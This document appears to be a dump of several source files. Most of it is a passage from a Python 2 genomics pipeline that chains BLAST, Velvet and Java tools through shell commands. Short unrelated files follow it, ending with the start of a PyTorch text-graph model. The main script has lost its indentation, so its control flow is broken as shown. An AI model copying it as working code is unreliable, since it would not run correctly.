tblastx=tblastx + namefile
tblastx=tblastx + ".tblastx.out"
print tblastx
tblastx_cmd=commands.getstatusoutput(tblastx)
print tblastx_cmd
# Run Blastxml
xml=Java + " -classpath "
xml=xml + PathSeq_java
xml=xml + " blastxml "
xml=xml + namefile
xml=xml + ".tblastx.out "
xml=xml + namefile
xml=xml + ".hit"
print xml
xml_cmd=commands.getstatusoutput(xml)
print xml_cmd
# create full query from the original reads and update Hit table
exqfull=Java + " -classpath "
exqfull=exqfull + PathSeq_java
exqfull=exqfull + " extractFullQuert4BHitTable "
exqfull=exqfull + namefile
exqfull=exqfull + " "
exqfull=exqfull + namefile
exqfull=exqfull + ".hit "
exqfull=exqfull + namefile
exqfull=exqfull + ".tblastx.hittable."
exqfull=exqfull + str(id_step)
exqfull=exqfull + "_"
exqfull=exqfull + str(dbindex)
print exqfull
exqfull_cmd=commands.getstatusoutput(exqfull)
print exqfull_cmd
# annotate the Hittable
annotate=Java+ " -classpath "
annotate=annotate + PathSeq_java
annotate=annotate + " annotate_hittable "
annotate=annotate + PathSeq_java
annotate=annotate + "/names.dmp "
annotate=annotate + PathSeq_java
annotate=annotate + "/nodes.dmp "
annotate=annotate + namefile
annotate=annotate + ".tblastx.hittable."
annotate=annotate + str(id_step)
annotate=annotate + "_"
annotate=annotate + str(dbindex)
annotate=annotate + " "
annotate=annotate + namefile
annotate=annotate + ".tblastx.annotate.hittable."
annotate=annotate + str(id_step)
annotate=annotate + "_"
annotate=annotate + str(dbindex)
print annotate
annotate_cmd=commands.getstatusoutput(annotate)
print annotate_cmd
# Sorting the file"
sort="sort +1 -2 -T " + Tmp_dir
sort=sort + " "
sort=sort + namefile
sort=sort + ".tblastx.annotate.hittable."
sort=sort + str(id_step)
sort=sort + "_"
sort=sort + str(dbindex)
sort=sort + " > "
sort=sort + namefile
sort=sort + ".tblastx.sort.tmp."
sort=sort + str(id_step)
sort=sort + "_"
sort=sort + str(dbindex)
print sort
sort_cmd=commands.getstatusoutput(sort)
print sort_cmd
# Extract unmapped reads from the Hit table
unmap=Java + " -classpath "
unmap=unmap + PathSeq_java
unmap=unmap + " extractUnmapped_newlatest "
unmap=unmap + namefile
unmap=unmap + ".tblastx.sort.tmp."
unmap=unmap + str(id_step)
unmap=unmap + "_"
unmap=unmap + str(dbindex)
unmap=unmap + blastx_thres
unmap=unmap + namefile
unmap=unmap + " "
unmap=unmap + namefile
unmap=unmap + ".unmappedtblastx.fq1."
unmap=unmap + str(id_step)
unmap=unmap + "_"
unmap=unmap + str(dbindex)
unmap=unmap + " "
unmap=unmap + namefile
unmap=unmap + ".mappedtblastx.fq1."
unmap=unmap + str(id_step)
unmap=unmap + "_"
unmap=unmap + str(dbindex)
print unmap
unmap_cmd=commands.getstatusoutput(unmap)
print unmap_cmd
# Copy the unmapped reads back to the original file for the next database round
copy="cp " + namefile
copy=copy + ".unmappedtblastx.fq1."
copy=copy + str(id_step)
copy=copy + "_"
copy=copy + str(dbindex)
copy=copy + " "
copy=copy + namefile
print copy
copy_cmd=commands.getstatusoutput(copy)
print copy_cmd
print "Statistics after TBLASTX Step"
stat="wc -l " + namefile
stat=stat + " > "
stat=stat + namefile
stat=stat + ".tblastx."
stat=stat + str(id_step)
stat=stat + "_"
stat=stat + str(dbindex)
stat=stat + ".stat"
print stat
stat_cmd=commands.getstatusoutput(stat)
print stat_cmd
elif data_split[0] == "TBLASTN":
print "TBLASTN";
# Convert the FQ1 to Fasta
fq1_2_fasta = Java + " -classpath "
fq1_2_fasta = fq1_2_fasta + PathSeq_java
fq1_2_fasta = fq1_2_fasta + " FQone2Fasta "
fq1_2_fasta = fq1_2_fasta + namefile
fq1_2_fasta = fq1_2_fasta + " "
fq1_2_fasta = fq1_2_fasta + namefile
fq1_2_fasta = fq1_2_fasta + ".fasta"
print fq1_2_fasta
fq1_2_fasta_cmd=commands.getstatusoutput(fq1_2_fasta)
print fq1_2_fasta_cmd
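# tblastn normally takes a protein query against a translated nucleotide database;
# feeding the read FASTA here assumes the sequences at this stage are protein-like.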
tblastn=Blast_loc + "tblastn -query "
tblastn=tblastn + namefile
tblastn=tblastn + ".fasta -db \""
tblastn=tblastn + data_split[1]
tblastn=tblastn + "\" -outfmt 5 -evalue 1 -max_target_seqs 5 -num_threads "
tblastn=tblastn + nthreads
tblastn=tblastn + " -out "
tblastn=tblastn + namefile
tblastn=tblastn + ".tblastn.out"
print tblastn
tblastn_cmd=commands.getstatusoutput(tblastn)
print tblastn_cmd
# Run Blastxml
xml=Java + " -classpath "
xml=xml + PathSeq_java
xml=xml + " blastxml "
xml=xml + namefile
xml=xml + ".tblastn.out "
xml=xml + namefile
xml=xml + ".hit"
print xml
xml_cmd=commands.getstatusoutput(xml)
print xml_cmd
# create full query from the original reads and update Hit table
exqfull=Java + " -classpath "
exqfull=exqfull + PathSeq_java
exqfull=exqfull + " extractFullQuert4BHitTable "
exqfull=exqfull + namefile
exqfull=exqfull + " "
exqfull=exqfull + namefile
exqfull=exqfull + ".hit "
exqfull=exqfull + namefile
exqfull=exqfull + ".tblastn.hittable."
exqfull=exqfull + str(id_step)
exqfull=exqfull + "_"
exqfull=exqfull + str(dbindex)
print exqfull
exqfull_cmd=commands.getstatusoutput(exqfull)
print exqfull_cmd
# annotate the Hittable
annotate=Java+ " -classpath "
annotate=annotate + PathSeq_java
annotate=annotate + " annotate_hittable "
annotate=annotate + PathSeq_java
annotate=annotate + "/names.dmp "
annotate=annotate + PathSeq_java
annotate=annotate + "/nodes.dmp "
annotate=annotate + namefile
annotate=annotate + ".tblastn.hittable."
annotate=annotate + str(id_step)
annotate=annotate + "_"
annotate=annotate + str(dbindex)
annotate=annotate + " "
annotate=annotate + namefile
annotate=annotate + ".tblastn.annotate.hittable."
annotate=annotate + str(id_step)
annotate=annotate + "_"
annotate=annotate + str(dbindex)
print annotate
annotate_cmd=commands.getstatusoutput(annotate)
print annotate_cmd
# Sorting the file"
sort="sort +1 -2 -T " + Tmp_dir
sort=sort + " "
sort=sort + namefile
sort=sort + ".tblastn.annotate.hittable."
sort=sort + str(id_step)
sort=sort + "_"
sort=sort + str(dbindex)
sort=sort + " > "
sort=sort + namefile
sort=sort + ".tblastn.sort.tmp."
sort=sort + str(id_step)
sort=sort + "_"
sort=sort + str(dbindex)
print sort
sort_cmd=commands.getstatusoutput(sort)
print sort_cmd
# Extract unmapped reads from the Hit table
unmap=Java + " -classpath "
unmap=unmap + PathSeq_java
unmap=unmap + " extractUnmapped_newlatest "
unmap=unmap + namefile
unmap=unmap + ".tblastn.sort.tmp."
unmap=unmap + str(id_step)
unmap=unmap + "_"
unmap=unmap + str(dbindex)
unmap=unmap + blastx_thres
unmap=unmap + namefile
unmap=unmap + " "
unmap=unmap + namefile
unmap=unmap + ".unmappedtblastn.fq1."
unmap=unmap + str(id_step)
unmap=unmap + "_"
unmap=unmap + str(dbindex)
unmap=unmap + " "
unmap=unmap + namefile
unmap=unmap + ".mappedtblastn.fq1."
unmap=unmap + str(id_step)
unmap=unmap + "_"
unmap=unmap + str(dbindex)
print unmap
unmap_cmd=commands.getstatusoutput(unmap)
print unmap_cmd
# Copy the unmapped reads back to the original file for the next database round
copy="cp " + namefile
copy=copy + ".unmappedtblastn.fq1."
copy=copy + str(id_step)
copy=copy + "_"
copy=copy + str(dbindex)
copy=copy + " "
copy=copy + namefile
print copy
copy_cmd=commands.getstatusoutput(copy)
print copy_cmd
print "Statistics after TBLASTN Step"
stat="wc -l " + namefile
stat=stat + " > "
stat=stat + namefile
stat=stat + ".tblastn."
stat=stat + str(id_step)
stat=stat + "_"
stat=stat + str(dbindex)
stat=stat + ".stat"
print stat
stat_cmd=commands.getstatusoutput(stat)
print stat_cmd
elif data_split[0] == "FINISH":
print "FINISH"
b_file=namefile + ".finaloutput"
finaloutname=open(b_file,'w')
finaloutname.write("Completed the mapping on the reads")
finaloutname.close()
if compute == "STANDALONE" :
count_finish = "ls -l " + cdir
count_finish = count_finish + "/"
count_finish = count_finish + "*.finaloutput | "
count_finish = count_finish + "wc -l"
print count_finish
count_finish_cmd=commands.getstatusoutput(count_finish)
print count_finish_cmd
else:
count_finish = "ls -l " + cdir
count_finish = count_finish + "/"
count_finish = count_finish + full_file
count_finish = count_finish + "_*_spt/"
count_finish = count_finish + "*.finaloutput | "
count_finish = count_finish + "wc -l"
print count_finish
count_finish_cmd=commands.getstatusoutput(count_finish)
print count_finish_cmd
print count_finish_cmd[1]
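# count_finish_cmd[1] is the text printed by "wc -l"; the equality test below
# therefore assumes total_split is a string with exactly the same formatting.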
if count_finish_cmd[1] == total_split:
# Concatenate the per-split results
run_concate = "python" + " "
run_concate = run_concate + PathSeq_loc
if compute == "STANDALONE" :
run_concate = run_concate + "/concat_files_standalone.py "
else:
run_concate = run_concate + "/concat_files.py "
run_concate = run_concate + namefile
run_concate = run_concate + " "
run_concate = run_concate + configfile
run_concate = run_concate + " "
run_concate = run_concate + pdir
run_concate = run_concate + " "
run_concate = run_concate + cdir
run_concate = run_concate + " "
run_concate = run_concate + id_step
run_concate = run_concate + " "
run_concate = run_concate + namefile_o
run_concate = run_concate + " "
run_concate = run_concate + mergesamjar
run_concate = run_concate + " "
run_concate = run_concate + Java
run_concate = run_concate + " "
run_concate = run_concate + Tmp_dir
run_concate = run_concate + " "
run_concate = run_concate + Samtools
print run_concate
run_concate_cmd=commands.getstatusoutput(run_concate)
print run_concate_cmd
mkdir_file = "mkdir " +pdir
mkdir_file = mkdir_file + "/"
mkdir_file = mkdir_file + "Final_combine_results"
print mkdir_file
mkdir_file_cmd=commands.getstatusoutput(mkdir_file)
print mkdir_file_cmd
cp_file = "rsync -av " + pdir
cp_file = cp_file + "/"
cp_file = cp_file + "*_PathSeq/combine_results/ "
cp_file = cp_file + pdir
cp_file = cp_file + "/"
cp_file = cp_file + "Final_combine_results/"
print cp_file
cp_file_cmd=commands.getstatusoutput(cp_file)
print cp_file_cmd
dir_results = pdir + "/"
dir_results = dir_results + "Final_combine_results"
print dir_results
os.chdir(dir_results)
dir_results = "ls -l "
print dir_results
dir_results_cmd=commands.getstatusoutput(dir_results)
print dir_results_cmd
htmlreport = Java + " -classpath "
htmlreport = htmlreport + PathSeq_java
htmlreport = htmlreport + " HTML_Report "
htmlreport = htmlreport + O_config
htmlreport = htmlreport + " "
htmlreport = htmlreport + O_inputfile
htmlreport = htmlreport + " "
htmlreport = htmlreport + pdir
htmlreport = htmlreport + "/Final_combine_results/REPORT.html"
print htmlreport
htmlreport_cmd=commands.getstatusoutput(htmlreport)
print htmlreport_cmd
elif data_split[0] == "FINISH_CLEAN":
print "FINISH CLEAN"
b_file=namefile + ".finaloutput"
finaloutname=open(b_file,'w')
finaloutname.write("Completed the mapping on the reads")
finaloutname.close()
if compute == "STANDALONE" :
count_finish = "ls -l " + cdir
count_finish = count_finish + "/"
count_finish = count_finish + "*.finaloutput | "
count_finish = count_finish + "wc -l"
print count_finish
count_finish_cmd=commands.getstatusoutput(count_finish)
print count_finish_cmd
else:
count_finish = "ls -l " + cdir
count_finish = count_finish + "/"
count_finish = count_finish + full_file
count_finish = count_finish + "_*_spt/"
count_finish = count_finish + "*.finaloutput | "
count_finish = count_finish + "wc -l"
print count_finish
count_finish_cmd=commands.getstatusoutput(count_finish)
print count_finish_cmd
print count_finish_cmd[1]
if count_finish_cmd[1] == total_split:
# Concatenate the per-split results
run_concate = "python" + " "
run_concate = run_concate + PathSeq_loc
if compute == "STANDALONE" :
run_concate = run_concate + "/concat_files_standalone.py "
else:
run_concate = run_concate + "/concat_files.py "
run_concate = run_concate + namefile
run_concate = run_concate + " "
run_concate = run_concate + configfile
run_concate = run_concate + " "
run_concate = run_concate + pdir
run_concate = run_concate + " "
run_concate = run_concate + cdir
run_concate = run_concate + " "
run_concate = run_concate + id_step
run_concate = run_concate + " "
run_concate = run_concate + namefile_o
run_concate = run_concate + " "
run_concate = run_concate + mergesamjar
run_concate = run_concate + " "
run_concate = run_concate + Java
run_concate = run_concate + " "
run_concate = run_concate + Tmp_dir
run_concate = run_concate + " "
run_concate = run_concate + Samtools
print run_concate
run_concate_cmd=commands.getstatusoutput(run_concate)
print run_concate_cmd
mkdir_file = "mkdir " +pdir
mkdir_file = mkdir_file + "/"
mkdir_file = mkdir_file + "Final_combine_results"
print mkdir_file
mkdir_file_cmd=commands.getstatusoutput(mkdir_file)
print mkdir_file_cmd
cp_file = "rsync -av " + pdir
cp_file = cp_file + "/"
cp_file = cp_file + "*_PathSeq/combine_results/ "
cp_file = cp_file + pdir
cp_file = cp_file + "/"
cp_file = cp_file + "Final_combine_results/"
print cp_file
cp_file_cmd=commands.getstatusoutput(cp_file)
print cp_file_cmd
dir_results = pdir + "/"
dir_results = dir_results + "Final_combine_results"
print dir_results
os.chdir(dir_results)
dir_results = "ls -l "
print dir_results
dir_results_cmd=commands.getstatusoutput(dir_results)
print dir_results_cmd
htmlreport = Java + " -classpath "
htmlreport = htmlreport + PathSeq_java
htmlreport = htmlreport + " HTML_Report "
htmlreport = htmlreport + O_config
htmlreport = htmlreport + " "
htmlreport = htmlreport + O_inputfile
htmlreport = htmlreport + " "
htmlreport = htmlreport + pdir
htmlreport = htmlreport + "/Final_combine_results/REPORT.html"
print htmlreport
htmlreport_cmd=commands.getstatusoutput(htmlreport)
print htmlreport_cmd
dir_results = pdir + "/"
print dir_results
os.chdir(dir_results)
dir_results = "ls -l "
print dir_results
dir_results_cmd=commands.getstatusoutput(dir_results)
print dir_results_cmd
rmfiles=pdir + "/clean.files"
finalout=open(rmfiles,'w')
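# The DeleteFolders commands assembled below are only written to clean.files for
# later execution; the commented-out getstatusoutput calls would run them in place.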
pathseq_out=pdir + "/"
pathseq_out=pathseq_out + "*_PathSeq"
print pathseq_out
filelist = glob.glob(pathseq_out)
for path in filelist:
print path
rmd = Java + " -classpath "
rmd = rmd + PathSeq_java
rmd = rmd + " DeleteFolders "
rmd = rmd + "DIR "
rmd = rmd + path
finalout.write(rmd)
finalout.write("\n")
#rmd_cmd=commands.getstatusoutput(rmd)
#print rmd_cmd
# shutil.rmtree(path, ignore_errors=True)
pathseq_out=pdir + "/"
pathseq_out=pathseq_out + "*.config"
filelist = glob.glob(pathseq_out)
for path in filelist:
print path
rmd = Java + " -classpath "
rmd = rmd + PathSeq_java
rmd = rmd + " DeleteFolders "
rmd = rmd + "FILE "
rmd = rmd + path
finalout.write(rmd)
finalout.write("\n")
print rmd
#rmd_cmd=commands.getstatusoutput(rmd)
#print rmd_cmd
# os.remove(path)
pathseq_out=pdir + "/"
pathseq_out=pathseq_out + "*.config.current.*"
print pathseq_out
filelist = glob.glob(pathseq_out)
for path in filelist:
print path
rmd = Java + " -classpath "
rmd = rmd + PathSeq_java
rmd = rmd + " DeleteFolders "
rmd = rmd + "FILE "
rmd = rmd + path
finalout.write(rmd)
finalout.write("\n")
print rmd
#rmd_cmd=commands.getstatusoutput(rmd)
#print rmd_cmd
# os.remove(path)
pathseq_out=pdir + "/"
pathseq_out=pathseq_out + "*.configlst"
print pathseq_out
filelist = glob.glob(pathseq_out)
for path in filelist:
print path
rmd = Java + " -classpath "
rmd = rmd + PathSeq_java
rmd = rmd + " DeleteFolders "
rmd = rmd + "FILE "
rmd = rmd + path
finalout.write(rmd)
finalout.write("\n")
print rmd
#rmd_cmd=commands.getstatusoutput(rmd)
#print rmd_cmd
# os.remove(path)
pathseq_out=pdir + "/"
pathseq_out=pathseq_out + "*.command"
filelist = glob.glob(pathseq_out)
for path in filelist:
print path
rmd = Java + " -classpath "
rmd = rmd + PathSeq_java
rmd = rmd + " DeleteFolders "
rmd = rmd + "FILE "
rmd = rmd + path
finalout.write(rmd)
finalout.write("\n")
print rmd
#rmd_cmd=commands.getstatusoutput(rmd)
#print rmd_cmd
# os.remove(path)
pathseq_out=pdir + "/"
pathseq_out=pathseq_out + "*.loader"
print pathseq_out
filelist = glob.glob(pathseq_out)
for path in filelist:
print path
rmd = Java + " -classpath "
rmd = rmd + PathSeq_java
rmd = rmd + " DeleteFolders "
rmd = rmd + "FILE "
rmd = rmd + path
print rmd
finalout.write(rmd)
finalout.write("\n")
#rmd_cmd=commands.getstatusoutput(rmd)
#print rmd_cmd
# os.remove(path)
pathseq_out=pdir + "/"
pathseq_out=pathseq_out + "*.current"
print pathseq_out
filelist = glob.glob(pathseq_out)
for path in filelist:
print path
rmd = Java + " -classpath "
rmd = rmd + PathSeq_java
rmd = rmd + " DeleteFolders "
rmd = rmd + "FILE "
rmd = rmd + path
print rmd
finalout.write(rmd)
finalout.write("\n")
#rmd_cmd=commands.getstatusoutput(rmd)
#print rmd_cmd
# os.remove(path)
pathseq_out=pdir + "/"
pathseq_out=pathseq_out + "*.current.*"
print pathseq_out
filelist = glob.glob(pathseq_out)
for path in filelist:
print path
rmd = Java + " -classpath "
rmd = rmd + PathSeq_java
rmd = rmd + " DeleteFolders "
rmd = rmd + "FILE "
rmd = rmd + path
print rmd
finalout.write(rmd)
finalout.write("\n")
#rmd_cmd=commands.getstatusoutput(rmd)
#print rmd_cmd
# os.remove(path)
finalout.close()
elif data_split[0] == "GATHER": # Gather steps that gathers the analyzed data
print "Completed the mapping on the reads"
b_file=namefile + ".finaloutput"
finaloutname=open(b_file,'w')
finaloutname.write("Completed the mapping on the reads")
finaloutname.close()
if compute == "STANDALONE" :
count_finish = "ls -l " + cdir
count_finish = count_finish + "/"
count_finish = count_finish + "*.finaloutput | "
count_finish = count_finish + "wc -l"
print count_finish
count_finish_cmd=commands.getstatusoutput(count_finish)
print count_finish_cmd
else:
count_finish = "ls -l " + cdir
count_finish = count_finish + "/"
count_finish = count_finish + full_file
count_finish = count_finish + "_*_spt/"
count_finish = count_finish + "*.finaloutput | "
count_finish = count_finish + "wc -l"
print count_finish
count_finish_cmd=commands.getstatusoutput(count_finish)
print count_finish_cmd
print count_finish_cmd[1]
if count_finish_cmd[1] == total_split:
print "Completed the mapping on the reads"
b_file=cdir + "/completed.txt"
if os.path.exists(b_file) :
print "Already initiated runs"
else:
finaloutname=open(b_file,'w')
finaloutname.write("C")
finaloutname.close()
# Concatenate the per-split results
run_concate = "python" + " "
run_concate = run_concate + PathSeq_loc
if compute == "STANDALONE" :
run_concate = run_concate + "/concat_files_standalone.py "
else:
run_concate = run_concate + "/concat_files.py "
run_concate = run_concate + namefile
run_concate = run_concate + " "
run_concate = run_concate + configfile
run_concate = run_concate + " "
run_concate = run_concate + pdir
run_concate = run_concate + " "
run_concate = run_concate + cdir
run_concate = run_concate + " "
run_concate = run_concate + id_step
run_concate = run_concate + " "
run_concate = run_concate + namefile_o
run_concate = run_concate + " "
run_concate = run_concate + mergesamjar
run_concate = run_concate + " "
run_concate = run_concate + Java
run_concate = run_concate + " "
run_concate = run_concate + Tmp_dir
run_concate = run_concate + " "
run_concate = run_concate + Samtools
print run_concate
run_concate_cmd=commands.getstatusoutput(run_concate)
print run_concate_cmd
new_id_step = int(id_step) + 1
cconfig = ""
newconfiglist = cdir + "/"
newconfiglist = newconfiglist + "next.configlist"
newconfiglist = newconfiglist + str(new_id_step)
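# The first line of nextconfiglist becomes the config for this round (cconfig);
# the remaining lines are written to newconfiglist for the round after it.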
foutname = open(nextconfiglist, 'r')
data_line=foutname.readlines()
foutname.close()
index=0
nfoutname = open(newconfiglist, 'w')
for no_databases2 in data_line:
line_1=no_databases2.strip()
if index == 0:
cconfig = line_1
index = index + 1
else:
nfoutname.write(line_1)
nfoutname.write("\n")
nfoutname.close()
dir_results = cdir + "/"
dir_results = dir_results + "combine_results"
print dir_results
os.chdir(dir_results)
subjob = "python" + " "
subjob = subjob + PathSeq_loc
subjob = subjob + "/"
subjob = subjob + "jobsubmission.py"
subjob = subjob + " "
subjob = subjob + namefile_o
subjob = subjob + ".unmappedfinal.fq1"
subjob = subjob + " "
subjob = subjob + cconfig
subjob = subjob + " "
subjob = subjob + newconfiglist
subjob = subjob + " "
subjob = subjob + compute
subjob = subjob + " "
subjob = subjob + pdir
subjob = subjob + " "
subjob = subjob + str(new_id_step)
subjob = subjob + " "
subjob = subjob + Institute
subjob = subjob + " "
subjob = subjob + PathSeq_loc
subjob = subjob + " "
subjob = subjob + Tmp_dir
subjob = subjob + " "
subjob = subjob + Java
subjob = subjob + " "
subjob = subjob + Bwa_loc
subjob = subjob + " "
subjob = subjob + Blast_loc
subjob = subjob + " "
subjob = subjob + Repeatmasker_loc
subjob = subjob + " "
subjob = subjob + Python
subjob = subjob + " "
subjob = subjob + Package_loader
subjob = subjob + " "
subjob = subjob + Loader_file
subjob = subjob + " "
subjob = subjob + Assembler_loc
subjob = subjob + " "
subjob = subjob + O_config
subjob = subjob + " "
subjob = subjob + O_inputfile
subjob = subjob + " "
subjob = subjob + Samtools
print "&&&&&&&&&&&&&"
print subjob
print "&&&&&&&&&&&&&"
subjob_cmd=commands.getstatusoutput(subjob)
print subjob_cmd
elif data_split[0] == "VELVET": # Velvet Assembler to run the assembly on unmapped reads
print "VELVET"
print cdir
# Convert the FQ1 to Fastq
fq1_2_fastq = Java + " -classpath "
fq1_2_fastq = fq1_2_fastq + PathSeq_java
fq1_2_fastq = fq1_2_fastq + " FQone2Fastq "
fq1_2_fastq = fq1_2_fastq + namefile
fq1_2_fastq = fq1_2_fastq + " "
fq1_2_fastq = fq1_2_fastq + namefile
fq1_2_fastq = fq1_2_fastq + ".fastq"
print fq1_2_fastq
fq1_2_fastq_cmd=commands.getstatusoutput(fq1_2_fastq)
print fq1_2_fastq_cmd
head_seq="head -1 "+namefile
if data_split[1] == "SINGLEEND":
# Run velveth (hashing stage)
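# hash_length is Velvet's k-mer size; it must be odd and smaller than the read length.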
Assembler = Assembler_loc + "velveth "
Assembler = Assembler + cdir
Assembler = Assembler +"/velvet_output/ "
Assembler = Assembler + hash_length
Assembler = Assembler + " "
Assembler = Assembler + " -fastq -short "
Assembler = Assembler + namefile
Assembler = Assembler + ".fastq"
print Assembler
Assembler_cmd=commands.getstatusoutput(Assembler)
print Assembler_cmd
# Run velvetg (contig-building stage)
Assembler = Assembler_loc + "velvetg "
Assembler = Assembler + cdir
Assembler = Assembler + "/velvet_output/ "
Assembler = Assembler + "-min_contig_lgth "
Assembler = Assembler + minlength_contigs
print Assembler
Assembler_cmd=commands.getstatusoutput(Assembler)
print Assembler_cmd
elif data_split[1] == "PAIRED_END": # NOT ENABLED YET
# Run velveth (hashing stage)
Assembler = Assembler_loc + "velveth "
Assembler = Assembler + cdir
Assembler = Assembler +"/velvet_output/ "
Assembler = Assembler + hash_length
Assembler = Assembler + " "
Assembler = Assembler + " -fastq -shortPaired "
Assembler = Assembler + namefile
Assembler = Assembler + ".fastq"
print Assembler
Assembler_cmd=commands.getstatusoutput(Assembler)
print Assembler_cmd
# Run velvetg (contig-building stage)
Assembler = Assembler_loc + "velvetg "
Assembler = Assembler + cdir
Assembler = Assembler + "/velvet_output/ "
Assembler = Assembler + "-min_contig_lgth "
Assembler = Assembler + data_split[2]
print Assembler
Assembler_cmd=commands.getstatusoutput(Assembler)
print Assembler_cmd
# Copy the contigs file
contig_fq1 = Java + " -classpath "
contig_fq1 = contig_fq1 + PathSeq_java
contig_fq1 = contig_fq1 + " Fas2FQ1 "
contig_fq1 = contig_fq1 + cdir
contig_fq1 = contig_fq1 + "/velvet_output/contigs.fa "
contig_fq1 = contig_fq1 + cdir
contig_fq1 = contig_fq1 + "/"
contig_fq1 = contig_fq1 + namefile_o
contig_fq1 = contig_fq1 + ".contigs.fq1"
print contig_fq1
contigfq1_cmd=commands.getstatusoutput(contig_fq1)
print contigfq1_cmd
elif data_split[0] == "GATHERASSEMBLER":
print "Completed the mapping on the reads"
b_file=namefile + ".finaloutput"
finaloutname=open(b_file,'w')
finaloutname.write("Completed the mapping on the reads")
finaloutname.close()
print cdir
print pdir
mkdir_file = "mkdir " +cdir
mkdir_file = mkdir_file + "/"
mkdir_file = mkdir_file + "combine_results"
print mkdir_file
mkdir_file_cmd=commands.getstatusoutput(mkdir_file)
print mkdir_file_cmd
cpfile="cp " +cdir
cpfile=cpfile +"/"
cpfile=cpfile +namefile_o
cpfile=cpfile +".contigs.fq1 "
cpfile=cpfile + cdir
cpfile=cpfile + "/"
cpfile=cpfile + "combine_results"
print cpfile
cpfile_cmd=commands.getstatusoutput(cpfile)
print cpfile_cmd
new_id_step = int(id_step) + 1
cconfig = ""
newconfiglist = cdir + "/"
newconfiglist = newconfiglist + "next.configlist"
newconfiglist = newconfiglist + str(new_id_step)
foutname = open(nextconfiglist, 'r')
data_line=foutname.readlines()
foutname.close()
index=0
nfoutname = open(newconfiglist, 'w')
for no_databases2 in data_line:
line_1=no_databases2.strip()
if index == 0:
cconfig = line_1
index = index + 1
else:
nfoutname.write(line_1)
nfoutname.write("\n")
nfoutname.close()
dir_results = cdir + "/"
dir_results = dir_results + "combine_results"
print dir_results
os.chdir(dir_results)
subjob = "python" + " "
subjob = subjob + PathSeq_loc
subjob = subjob + "/"
subjob = subjob + "jobsubmission.py"
subjob = subjob + " "
subjob = subjob + namefile_o
subjob = subjob + ".contigs.fq1"
subjob = subjob + " "
subjob = subjob + cconfig
subjob = subjob + " "
subjob = subjob + newconfiglist
subjob = subjob + " "
subjob = subjob + compute
subjob = subjob + " "
subjob = subjob + pdir
subjob = subjob + " "
subjob = subjob + str(new_id_step)
subjob = subjob + " "
subjob = subjob + Institute
subjob = subjob + " "
subjob = subjob + PathSeq_loc
subjob = subjob + " "
subjob = subjob + Tmp_dir
subjob = subjob + " "
subjob = subjob + Java
subjob = subjob + " "
subjob = subjob + Bwa_loc
subjob = subjob + " "
subjob = subjob + Blast_loc
subjob = subjob + " "
subjob = subjob + Repeatmasker_loc
subjob = subjob + " "
subjob = subjob + Python
subjob = subjob + " "
subjob = subjob + Package_loader
subjob = subjob + " "
subjob = subjob + Loader_file
subjob = subjob + " "
subjob = subjob + Assembler_loc
subjob = subjob + " "
subjob = subjob + O_config
subjob = subjob + " "
subjob = subjob + O_inputfile
subjob = subjob + " "
subjob = subjob + Samtools
print "&&&&&&&&&&&&&"
print subjob
print "&&&&&&&&&&&&&"
subjob_cmd=commands.getstatusoutput(subjob)
print subjob_cmd
elif data_split[0] == "CLEAN":
clean_file = pdir + "/"
clean_file = clean_file + "Clean.cmd"
print clean_file
clean_file_cmd=commands.getstatusoutput(clean_file)
print clean_file_cmd
end_time = time.time()
timetaken= (end_time - start_time)
print "Time Taken:"
print timetaken
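# Two minimal helper sketches, defined here for illustration only and not invoked
# above; the names run_step and write_delete_cmds are assumptions, and both rely
# on globals (commands, glob, Java, PathSeq_java) the script already uses.
def run_step(cmd):
    # The build / print / getstatusoutput / print pattern used by every step above.
    print cmd
    result = commands.getstatusoutput(cmd)
    print result
    return result

def write_delete_cmds(out, kind, pattern):
    # Compact form of the FINISH_CLEAN glob loops: write one DeleteFolders command
    # per matched path to the clean.files handle; kind is "DIR" or "FILE".
    for path in glob.glob(pattern):
        cmd = Java + " -classpath " + PathSeq_java + " DeleteFolders " + kind + " " + path
        print cmd
        out.write(cmd)
        out.write("\n")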
hexsha: 3ce6bc5ef48b530a9c423ba1f3121ce4e5a84356 | path: utilities/__init__.py | repo: eaingaran/TimeMachine @ f6199827ffc358dd32f26edd8d68e2dbf7c63a90 | license: MIT | lang: Python | size: 165 bytes
from utilities import DATABASE_TYPE
from utilities import FILE_FORMAT
from utilities import Path
from utilities import RUN_MODE
from utilities import ReadWriteExcel
hexsha: a735347509569e04fbca725e8d482cc504621458 | path: flanaapis/weather/__init__.py | repo: AlberLC/flanaapis @ a1124d0fc8c77b7baa459b63a789fc4b22799ee2 | license: MIT | lang: Python | size: 259 bytes | stars: 1
from flanaapis.weather.constants import *
from flanaapis.weather.functions import *
from flanaapis.weather.google import *
from flanaapis.weather.models import *
from flanaapis.weather.open_weather_map import *
from flanaapis.weather.visual_crossing import *
hexsha: 599ca9e0ddb1ff669f62fe3edfecc595dbb1e45a | path: src/core/models/text_graph.py | repo: yuanqidu/IDGL @ 64d2d73289ca0f6dcab966062d4cb15844236b37 | license: Apache-2.0 | lang: Python | size: 14,611 bytes | stars: 153 | issues: 17 | forks: 21
import torch
import torch.nn as nn
import torch.nn.functional as F
from ..layers.graphlearn import GraphLearner, get_binarized_kneighbors_graph
from ..layers.scalable_graphlearn import AnchorGraphLearner
from ..layers.anchor import AnchorGCN
from ..layers.common import dropout, EncoderRNN
from ..layers.gnn import GCN, GAT
from ..utils.generic_utils import to_cuda, create_mask, batch_normalize_adj, normalize_adj  # normalize_adj is called below but was missing from the original imports; assumed to live in generic_utils
from ..utils.constants import VERY_SMALL_NUMBER
class TextGraphRegression(nn.Module):
def __init__(self, config, w_embedding, word_vocab):
super(TextGraphRegression, self).__init__()
self.config = config
self.name = 'TextGraphRegression'
self.device = config['device']
# Shape
word_embed_dim = config['word_embed_dim']
hidden_size = config['hidden_size']
# Dropout
self.dropout = config['dropout']
self.word_dropout = config.get('word_dropout', config['dropout'])
self.rnn_dropout = config.get('rnn_dropout', config['dropout'])
# Graph
self.graph_learn = config['graph_learn']
self.graph_metric_type = config['graph_metric_type']
self.graph_module = config['graph_module']
self.graph_skip_conn = config['graph_skip_conn']
self.graph_include_self = config.get('graph_include_self', True)
# Text
self.word_embed = w_embedding
if config['fix_vocab_embed']:
print('[ Fix word embeddings ]')
for param in self.word_embed.parameters():
param.requires_grad = False
self.ctx_rnn_encoder = EncoderRNN(word_embed_dim, hidden_size, bidirectional=True, num_layers=1, rnn_type='lstm',
rnn_dropout=self.rnn_dropout, device=self.device)
self.linear_out = nn.Linear(hidden_size, 1, bias=False)
self.scalable_run = config.get('scalable_run', False)
if not config.get('no_gnn', False):
print('[ Using TextGNN ]')
if self.graph_module == 'gcn':
gcn_module = AnchorGCN if self.scalable_run else GCN
